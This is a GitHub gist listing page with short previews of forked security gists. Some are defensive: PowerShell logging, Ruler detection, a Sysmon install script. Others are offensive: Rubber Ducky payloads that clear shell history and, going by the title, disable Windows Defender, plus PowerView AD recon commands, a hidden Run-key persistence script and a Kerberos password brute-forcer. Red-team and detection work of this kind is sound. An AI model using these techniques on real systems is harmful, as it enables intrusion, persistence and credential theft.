Anthony Bordel minkione
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install Oracle Java 8 | |
| apt-get install software-properties-common | |
| add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" && apt-get update | |
| apt-get install oracle-java8-installer | |
| # Installing Dependencies | |
| apt-get update | |
| apt-get upgrade | |
| apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev |
minkione
/ PowerShell Command Line Logging
Created
May 22, 2017 09:02
— forked from gfoss/PowerShell Command Line Logging
Detect and alert on nefarious PowerShell command line activity
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
| # For detecting dangerous PowerShell Commands/Functions | |
| Log Source Type: | |
| MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
| Add this file to your PowerShell directory to enable verbose command line audit logging | |
| profile.ps1 | |
| $LogCommandHealthEvent = $true | |
| $LogCommandLifeCycleEvent = $true |
minkione
/ onDC.ps1
Created
May 31, 2017 07:13
— forked from staaldraad/onDC.ps1
Detect Possible Ruler usage On Exchange and Domain Controller
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-EventLog -InstanceId 4776 -LogName "Security" | ForEach-Object { | |
| $sp = $_.message -split "`n" | |
| $tmp = $sp | Select-String -Pattern 'RULER' | |
| if($tmp.count -ge 1){ | |
| Write-Host "Possible Ruler usage at: " $_.TimeGenerated | |
| $sp | Select-String -Pattern 'Logon Account:' | write-host | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Title: Root Phisher | |
| REM Target: Ubuntu Desktop >= 11.04 | |
| REM Last Modified: April 28, 2017 | |
| REM Author: Vi Grey | |
| REM Copyright: BSD 2-Clause License | |
| DELAY 1000 | |
| CTRL-ALT t | |
| DELAY 400 | |
| STRING a=$HISTFILE;unset HISTFILE | |
| ENTER |
minkione
/ duckyscript.txt
Created
June 6, 2017 09:54
— forked from judge2020/duckyscript.txt
Ducky: turnoff windows defender, download and execute a file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Windows 10: Disable Windows Defender with Powershell | |
| REM Author: Judge2020 | |
| REM author website: Judge2020.com | |
| REM video: https://youtu.be/XQyB_bKjbgU | |
| REM | |
| REM let the HID enumerate | |
| DELAY 2000 | |
| GUI r | |
| DELAY 300 | |
| REM my best attempt at a elevated powershell instance |
minkione
/ PowerView-2.0-tricks.ps1
Created
June 20, 2017 09:06
— forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
minkione
/ PowerView-3.0-tricks.ps1
Created
June 20, 2017 09:35
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
minkione
/ install.bat
Created
July 11, 2017 08:22
— forked from deruke/install.bat
Sysmon and nxlog startup install script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| :install_nxlog | |
| sc query "nxlog" | Find "RUNNING" >NUL | |
| If NOT "%ERRORLEVEL%" EQU "1" ( | |
| goto install_sysmon | |
| ) | |
| echo Installing NXLOG | |
| \\domain.local\SYSVOL\software\nxlog-ce-2.9.1716.msi /quiet | |
| copy /z /y “\\domain.local\SYSVOL\software\nxlog.conf" "C:\Program Files (x86)\nxlog\conf" |
minkione
/ PSReflect-RegHide.ps1
Created
July 20, 2017 09:47
— forked from brianreitz/PSReflect-RegHide.ps1
PowerShell script to hide a Run key like Reghide/Kovter/Poweliks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # requires PSReflect.ps1 to be in the same directory as this script | |
| . .\PSReflect.ps1 | |
| $Module = New-InMemoryModule -ModuleName RegHide | |
| # Define our structs. | |
| # https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx | |
| # typedef struct _UNICODE_STRING { | |
| # USHORT Length; | |
| # USHORT MaximumLength; |
minkione
/ kinit_brute.sh
Created
July 28, 2017 00:33
— forked from ropnop/kinit_brute.sh
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Title: kinit_brute.sh | |
| # Author: @ropnop | |
| # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
| # The script configures the realm and KDC for you based on the domain provided and the domain controller | |
| # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
| # Only tested with Heimdal kerberos (error messages might be different for MIT clients). Install: $ apt-get install heimdal-clients | |